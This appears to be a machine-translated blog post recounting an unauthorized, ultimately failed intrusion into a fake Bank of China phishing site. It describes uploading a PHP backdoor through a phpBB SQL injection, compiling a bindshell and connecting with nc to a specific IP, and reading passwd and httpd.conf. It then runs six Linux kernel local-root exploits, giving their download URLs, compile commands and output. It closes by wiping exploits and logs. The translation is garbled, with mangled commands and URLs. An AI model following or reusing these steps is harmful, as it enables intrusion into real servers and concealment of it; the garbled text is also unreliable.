Author: Aku
http://www.coolersky.com/
I didn't intend to put this unsuccessful
Intrusion
Written, later there are several friends who want to see, since there is no one who can be exchanged, there is no one, and the skeleton can be sent out. The beginner can learn from a little experience, the master can do more attempts, I also want to Multi-learn something.
I saw a report of Tian Tian Net on the evening of the 27th:
The Bank of China has once again encountered a clone fake website far in North America.
, This site reprint path:
_
Blank>
Http://www.coolersky.com/web/news/2005028014041.asp
I have to organize planning, since this thing, let's take a look. Don't say nonsense, start!
1, collect information
service
Information:
Apache / 1.3.33
PHP / 4.3.9
Website main file:
_
Blank>
http://www.banochi.net/english/index.shtml
View the fake website, basically no things available, it is estimated that only records
password
And IP CGI program. apart from
service
Be aware of
Intrusion
You can also consider the next note.
Retrieve other sites, analyze several PHP sites injected, not much to use. Remembrance of phpbb's cave, writing
Code
Retrieve the viewtopic.php file, find a phpbb2.0.10
Intrusion
point
_
Blank>
http://www.bits-clsu.org/forum/viewtopic.php?t=1
I remember that I can use the next afterwards.
tool
Directly to retrieve, all the same.
2, upload Trojan
Use PHPBB holes,
Vulnerability
Introduction
"PHPBB remotely arbitrary SQL injection vulnerability
","
PHPBBSQL
injection
Vulnerability
Analysis "Upload the PHP Back Door.
3, generate bindshell
When I was watching the document, Edward has already made a bindshell, huh, huh! basic method:
Upload bindshell.c
GCC -O / TMP / BIND BINDSHELL.C / TMP / BIND
Take a look at NC, or it is more convenient under the shell.
NC -VV 216.22.48.72 7758
4, collect system information
After getting WebShell, you can get some basic information including Passwd, httpd.conf, etc., retrieve the absolute path of false websites / Home / Banochin / Public
_
HTML /, view files created in Webshell is
service
Merchant time 2004-12-15, there is a document in its cgi-bin directory
Document creation date Finally modify the size attribute [MEMBER] 2005-02-21 21:39:03 2005-02-21 21:39:03 0700 errlog.dat 2005-02-28 00:32:22 2005-02-2800 : 32: 22 140.186 KB 0600 id.dat 2005-02-24 10:48:35 2005-02-24 10:48:35 1.727 KB 0600 INDEX.HTM 2004-12-15 03:19:51 2004-12- 15 03:19:51 0.Dat 2005-02-25 00:36:15 2005-02-25 00:36:15 0.170 KB 0600 PWDBAK.DAT 2004-12-15 03:24:17 2004-12 -15 03:19:55 0.516 KB 0600 Security.cgi 2004-12-15 03:24:03 2004-12-15 03:20:00 44.363 KB 0700 Visemailer.cgi 2004-12-15 03:24:04 2004 -12-15 03:20:02 3.554 KB 0700 can see the last record
password
Date is February 25, and after the browsing directory, it is found that there are also many Chinese banking websites in other languages, but basically HTML files, they must be directly WebDump from Bank of China.
Kernel information, because we have no write permissions on its directory, and then to do is right. It took about 1 hour before and after, and the rest of the right to put the right to spend more than 1 day, the result is still not done, depressed!
Uname -r 2.4.20-021staB022.11.777-Enterprise
5, local upgrade permission test
Increase environment variables export path = / usr / bin: $ PATH Otherwise, Collect2: Cannot Find `ld 'error!
(1) Linux kernel Moxa serial driver BSS overflow
Vulnerability
Grsecurity 2.1.0 Release / 5 Linux Kernel Advisories
URL:
[url = target = _BLANK #?> _bug & do = view & bughtp://www.nsfocus.net/index.php? ACT = SEC
_
Bug & do = view & bug
_
ID = 7446 & keyword =
_
Blank>
Http://lists.netsys.com/pipermail/full-disclosure/2005-january/030660.html
file:
[url = target = _blank #?> _Andhttp: //grsecurity.net/~spender/exploits
_
and
_
Patches.tgz
test:
Wget
[url = target = _blank #?> _Andhttp: //grsecurity.net/~spender/exploits
_
and
_
Patches.tgz
Tar -Zxvf Exploits
_
and
_
Patches.tgz
CD Exploits
_
and
_
Patches
Make alloc = 0x100000
-------------------------------------------------- ----------------------
NASM -F Elf-Dallocate = 32482374 mlock-dos.smake: NASM: Command Not Found
Make: *** [all] Error 127
-------------------------------------------------- ----------------------
in conclusion:
Lack of NASM, even if the upload rpm is not possible!
(2) Linux kernel uselib () privilege
Vulnerability
Linux kernel sys
_
Userib local root vulnerability
URL:
[url = target = _BLANK #?> _bug & do = view & bughtp://www.nsfocus.net/index.php? ACT = SEC
_
Bug & do = view & bug
_
ID = 7326 & keyword =
_
Blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110513415105841&q=raw
_
Blank>
Http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&w=2
_
Blank>
Http://isec.pl/vulnerabilities/isec-0021-uselib.txt
file:
_
Blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
test:
GCC -O2 -FOMIT-FRAME-POINTER ELFLBL
_
V108.c -o elflbl
_
V108
-------------------------------------------------- ----------------------
Elflbl
_
V108.c: in function` Check
_
VMA
_
Flags':
Elflbl
_
V108.c: 545: Warning: Deprecated Use of label at End of Compound Statement
-------------------------------------------------- ----------------------
./elflbl
_
V108
-------------------------------------------------- ----------------------
Child 1 Vmas 0
[ ] Moved Stack BFF73000, Task
_
Size = 0xc0000000, Map
_
Base = 0xBF800000
[ ] Vmalloc isa 0xc7c00000 - 0xcf707000
Wait ... -SEGMentation Fault
-------------------------------------------------- -----------------------
GCC -O2 -FOMIT-FRAME-POINTER ELFLBL
_
v109.c -o elflbl
_
V109
./elflbl
_
V109
-------------------------------------------------- ---------------------- [ ] SLAB CLEANUP
[-] Failed: Get
_
SLAB
_
Objs: / proc / slabinfo not readable? (No Such file or directory)
SH: Line 9: 24080 killed ./elbrbl
_
V109
-------------------------------------------------- ----------------------
(3) Linux kernel local integer overflow and memory disclosure
Vulnerability
Fun with
linux
kernel
URL:
[url = target = _BLANK #?> _bug & do = view & bughtp://www.nsfocus.net/index.php? ACT = SEC
_
Bug & do = view & bug
_
ID = 7269 & keyword =
_
Blank>
http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
test:
GCC -O VC VC
_
Resize.c
./vc
_
Resize
-------------------------------------------------- ----------------------
Open: No Such Device Or Address
-------------------------------------------------- ----------------------
GCC Memory
_
Leak.c -o memory
_
Leak
-------------------------------------------------- ----------------------
Memory
_
Leak.c: 80: 2: Warning: No Newline At End of File
-------------------------------------------------- ----------------------
(4) Linux kernel do
_
MREMAP VMA Local Permissions
Vulnerability
Linux Kernel Do
_
MREMAP VMA LIMIT LOCAL PRIVILEGE ESCALATION
URL:
[url = target = _BLANK #?> _bug & do = view & bughtp://www.nsfocus.net/index.php? ACT = SEC
_
Bug & do = view & bug
_
ID = 6102 & keyword =% CC% E1% C9% FD
_
Blank>
http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
file:
_
Blank> http://rhea.oamk.fi/~pyanil00/temp/mremap
_
PTE.c
test:
GCC -O3 -STATIC -FOMIT-FRAME-POINTER MREMAP
_
PTE.c -o mremap
_
PTE
. /mremap
_
PTE
-------------------------------------------------- ---------------------- [ ] kernel 2.4.20-021staB022.11.777-Enterprise Vulnerable: Yes Exploitable YES
Mmap # 65530 0x50bfa000 - 0x50bfb000
[-] Failed
-------------------------------------------------- ----------------------
(5) Linux kernel kmod / ptrace competitive condition privileges
Vulnerability
linux
KMOD / PTRACE BUG - DETAILS
URL:
[url = target = _BLANK #?> _bug & do = view & bughtp://www.nsfocus.net/index.php? ACT = SEC
_
Bug & do = view & bug
_
ID = 4570 & keyword =% cc% E1% C9% FD
_
Blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
file:
_
Blank>
http://august.v-lo.krakow.pl/~anszom/km3.c
test:
GCC -O KM3 km3.c ./km3? --------------------------------------- -------------------------------- USAGE: ./km3 [-d] [-b] [-r] [-s] [-c executable] -d - use double-ptrace method (to run interactive program) -b - start bindshell on port 4112 -r - support randomized pids -c - choose executable to start -s - SINGLE-SHOT MODE - ABORT IF UNSUCCESSFUL AT THE FIRST TRY ---------------------------------------------------------------------------------------------------- ------------------------------------------- -------------------------------------------------- ------------- Linux Kmod PTRACE LOCAL ROOT EXPLOIT BY => Simple Mode, Executing / USR / BIN / ID> / dev / ttySizeof (shellcode) = 95 => Child Process Started .. ........ failed ----------------------------------------- -------------------------------
(6) Linux kernel i386 SMP page error processor privilege upgrade
Vulnerability
Linux Kernel i386 SMP Page Fault Handler Privilege Escalation
URL:
[url = target = _blank #?> _bug & do = view & bughtp://www.nsfocus.net/index.php? ACT = sec_
Bug & do = view & bug
_
ID = 7338
_
Blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
test:
GCC -O SMP SMP.c ./smp ------------------------------------------ -------------------------------- [ ] in Thread 1 (PID = 5400) [ ] in Thread 2 PID = 5401) [ ] RDTSC CALIBRATION: 53428 [ ] Exploiting Race, Wait ... [-] Unable to Exploit Race in 30s, kernel patched or loading too hardh. -------------- -------------------------------------------------- ------------
Do not succeed in multiple local rights! Very depressed! In the test process, the false website has been closed, although the document is still, but it is clear that the official has made efforts and got a good result.
6, other
A few
linux
The keyboard record must be root privileges. and
service
The SSH of remote connection is used, and it is estimated that there is no drama using Sniffer, so there is no idea, clean up Exp, log files.
The above is the result of some of my tests, and the results have not got root, but I have sorted out the relevant.
Vulnerability
I hope some help from everyone. I have released the relevant results in the webmaster group, and no one returned, I don't know if everyone is too busy. . .
Not specially handled in the text
Vulnerability
And the result, interested can be used directly, but it is not necessary to be difficult to other sites, I want everyone to understand what I mean!
I have been tossing for so long, there is still a lot of things to do! I hope that I will not be said to be boss, huh, huh!
Finally, thank you Edward, the old black and several companies!
The article can be reproduced at will, but please indicate the source, especially all and some of the contents of the article may not be any commercial or
Toll
Behavior, thank you!
